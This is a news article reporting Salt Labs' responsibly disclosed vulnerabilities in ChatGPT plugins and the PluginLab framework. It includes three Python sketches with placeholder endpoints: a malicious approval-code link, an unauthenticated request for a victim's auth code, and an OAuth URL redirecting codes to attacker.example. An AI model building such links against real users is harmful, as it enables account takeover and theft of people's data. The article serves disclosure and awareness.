ChatGPT Plugins Exposed to Critical Vulnerabilities, Risked User Data

By Deeba Ahmed

Critical security flaws found in ChatGPT plugins expose users to data breaches. Attackers could steal login details and access sensitive data on third-party websites – Update your plugins now and only use extensions from trusted sources to stay safe from AI-driven cyber threats.

Salt Security, a leader in application programming interface (API) security, has discovered critical security vulnerabilities in popular plugins for OpenAI’s AI chatbot ChatGPT. These flaws could allow attackers to steal sensitive user data, gain unauthorized access to accounts on third-party websites, and retrieve data from services such as Google Drive.

This means ChatGPT plugin functionality, now known as GPTs, could be an attack vector: the vulnerabilities allow bad actors to access third-party user accounts, including GitHub repositories, gain control of an organization’s accounts on third-party websites, and access sensitive data.

For your information, ChatGPT plugins (available only on the GPT-4 model, which requires a ChatGPT Plus subscription) are designed to enhance the chatbot’s capabilities by letting it interact with external services across various domains. However, when using ChatGPT plugins, organizations may inadvertently permit them to send sensitive data to third-party websites and to access private external accounts.

**Three Vulnerabilities**

According to Salt Labs’ research, shared with Hackread.com ahead of publication on Wednesday, the company discovered three vulnerabilities within ChatGPT plugins.

**First Vulnerability**

The first vulnerability was in ChatGPT itself: during plugin installation, users are redirected to the plugin’s website and then sent back with an approval code. Attackers can exploit this flow by sending a victim a link containing an approval code for the attacker’s own malicious plugin, which installs the attacker’s credentials on the victim’s account. Any message the victim then writes in ChatGPT may be forwarded to that plugin, giving the attacker access to proprietary information.
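
To make that flow concrete, here is a minimal sketch in Python of the link an attacker might craft. The callback URL and parameter name are assumptions for illustration only; Salt Labs did not publish the exact endpoints.

```python
# Hypothetical illustration of the code-injection flow described above.
# The endpoint and parameter names are assumptions, not OpenAI's real API.
from urllib.parse import urlencode

# 1. The attacker begins a normal plugin installation for their OWN
#    account and captures the approval code the plugin site issues.
attacker_code = "attacker-issued-approval-code"  # placeholder value

# 2. They craft the callback link that normally completes the install,
#    embedding the attacker's code instead of one issued to the victim.
params = urlencode({"code": attacker_code})
malicious_link = f"https://chat.openai.com/aip/example-plugin/oauth/callback?{params}"

# 3. If the victim clicks the link while logged in to ChatGPT, the
#    plugin is installed on the victim's account with the attacker's
#    credentials, so the victim's chat content flows to an account
#    the attacker controls.
print("Send to victim:", malicious_link)
```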

**Second Vulnerability**

The second vulnerability was identified in PluginLab, a framework used to develop ChatGPT plugins. Salt Labs found that PluginLab does not implement proper security measures during the installation process, allowing attackers to potentially install malicious plugins without a user’s knowledge.

Because PluginLab did not authenticate user accounts, an attacker could insert another user’s ID and obtain a code issued for the victim, leading to account takeover. One affected plugin, “AskTheCode,” which integrates ChatGPT with GitHub, would let an attacker access a victim’s GitHub account.
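
As a rough illustration of that unauthenticated step, the sketch below shows a request in which the attacker simply substitutes the victim’s user ID. The host, path, and field names are assumptions based on the description above, not PluginLab’s documented API.

```python
# Hypothetical sketch of the flaw as described: the code-issuing
# endpoint trusts a caller-supplied member ID instead of an
# authenticated session. All names here are placeholders.
import requests

AUTH_HOST = "https://auth.pluginlab.example"  # placeholder host

def request_auth_code(member_id: str) -> str:
    # No session cookie or bearer token is required: the server issues
    # a code for whichever member_id the caller supplies.
    resp = requests.post(f"{AUTH_HOST}/oauth/code", json={"memberId": member_id})
    resp.raise_for_status()
    return resp.json()["code"]

# Swapping in the victim's ID yields a code that the attacker can
# redeem to attach the victim's plugin account (and, through
# AskTheCode, the victim's GitHub access) to the attacker's session.
victim_code = request_auth_code(member_id="victim-member-id")
```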

**Third Vulnerability**

The third vulnerability involved OAuth redirection manipulation: an attacker could send a victim a specially crafted URL that redirects the plugin’s authentication flow to an attacker-controlled server, stealing the victim’s credentials. Many ChatGPT plugins request broad permissions to access various websites, so a compromised plugin could expose login credentials or other sensitive data from those third-party sites.
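
As a generic sketch of how redirect manipulation works in an OAuth flow (the authorization endpoint, client ID, and scope below are illustrative placeholders, not values from the Salt Labs report), the attacker rewrites the redirect_uri so the victim’s authorization code is delivered to a server the attacker controls:

```python
# Generic OAuth redirect-manipulation sketch; all URLs are placeholders.
from urllib.parse import urlencode

params = urlencode({
    "response_type": "code",
    "client_id": "example-plugin-client-id",
    # A vulnerable authorization server accepts this value unvalidated,
    # so the victim's authorization code is sent to the attacker.
    "redirect_uri": "https://attacker.example/collect",
    "scope": "read_user_data",
})
malicious_link = f"https://auth.example-plugin.com/oauth/authorize?{params}"

# The attacker sends this link to the victim; once the victim approves,
# attacker.example receives ?code=... and can exchange it for a token
# tied to the victim's account.
print(malicious_link)
```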

Following responsible disclosure practices, Salt Labs’ researchers worked with OpenAI and the third-party vendors to address the issues promptly, before they could be exploited in the wild.

This research highlights the growing adoption of AI and the security risks that come with it. In January 2024, Kaspersky discovered over 3,000 dark web posts in which threat actors discussed exploiting AI-powered chatbots like ChatGPT, or building similar tools, to conduct cybercrime.

Group-IB’s recently published “Hi-Tech Crime Trends 23/24” report shows a surge in the use of AI by cybercriminals, particularly the trade in stolen ChatGPT credentials, which can be used to access sensitive corporate data. Over 225,000 infostealer logs containing compromised ChatGPT credentials were detected between January and October 2023.

Therefore, users are advised to carefully review permissions, install plugins only from trusted sources, and keep ChatGPT and its plugins up to date. Plugin developers should address code execution vulnerabilities to safeguard user data, and PluginLab developers should implement robust security measures throughout the plugin development lifecycle.

  1. OpenAI’s ChatGPT Can Create Polymorphic Malware
  2. Malicious Abrax666 AI Chatbot Exposed as Potential Scam
  3. Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack
  4. Following WormGPT, FraudGPT Emerges for AI-Driven Cyber Crime
  5. Researchers create polymorphic BlackMamba malware with ChatGPT
